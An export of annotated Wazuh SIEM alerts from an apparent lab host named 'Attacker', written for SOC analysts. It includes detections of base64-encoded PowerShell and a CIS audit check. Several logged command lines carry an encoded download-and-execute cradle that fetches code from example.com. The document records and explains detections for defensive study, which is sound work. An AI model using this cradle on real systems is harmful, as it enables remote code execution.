🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:33.795+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:33.795+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  72
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534313.1639457
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:31.9272596Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284660
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:29.313 ProcessGuid: {94294ddc-bd65-680a-780b-000000000e00} ProcessId: 16300 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd62-680a-760b-000000000e00} ParentProcessId: 16188 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:29.313
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd65-680a-780b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd62-680a-760b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16188
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:34.742+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:34.742+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  76
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534314.1647528
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:32.1436825Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284661
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:38:32.118 ProcessGuid: {94294ddc-bd65-680a-780b-000000000e00} ProcessId: 16300 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_5fxg3jxr.0j5.ps1 CreationUtcTime: 2025-04-24 22:38:32.118 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:32.118
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd65-680a-780b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_5fxg3jxr.0j5.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:38:32.118
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:38:35.328+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:35.328+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit File Share' is set to 'Success and Failure'.: Status changed from failed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19013
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.6.2']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['3.3', '8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534315.1650297
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26158
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit File Share' is set to 'Success and Failure'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to audit attempts to access a shared folder. The recommended state for this setting is: Success and Failure. Note: There are no system access control lists (SACLs) for shared folders. If this policy setting is enabled, access to all shared folders on the system is audited.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  In an enterprise managed environment, workstations should have limited file sharing activity, as file servers would normally handle the overall burden of file sharing activities. Any unusual file sharing activity on workstations may therefore be useful in an investigation of potentially malicious activity.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Success and Failure: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Object Access\Audit File Share
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.6.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  3.3,8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"File Share"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
Outcome of the check: passed, failed, or not applicable (as here, where the check command timed out; see data.sca.check.reason). Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"File Share"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  failed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:37.380+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:37.380+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  73
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534317.1653536
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:38:34.7701903Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  284685
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:38:33.507 ProcessGuid: {94294ddc-bd69-680a-7b0b-000000000e00} ProcessId: 7408 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd65-680a-780b-000000000e00} ParentProcessId: 16300 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:38:33.507
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd69-680a-7b0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  7408
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd65-680a-780b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16300
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:38:37.425+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:38:37.425+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

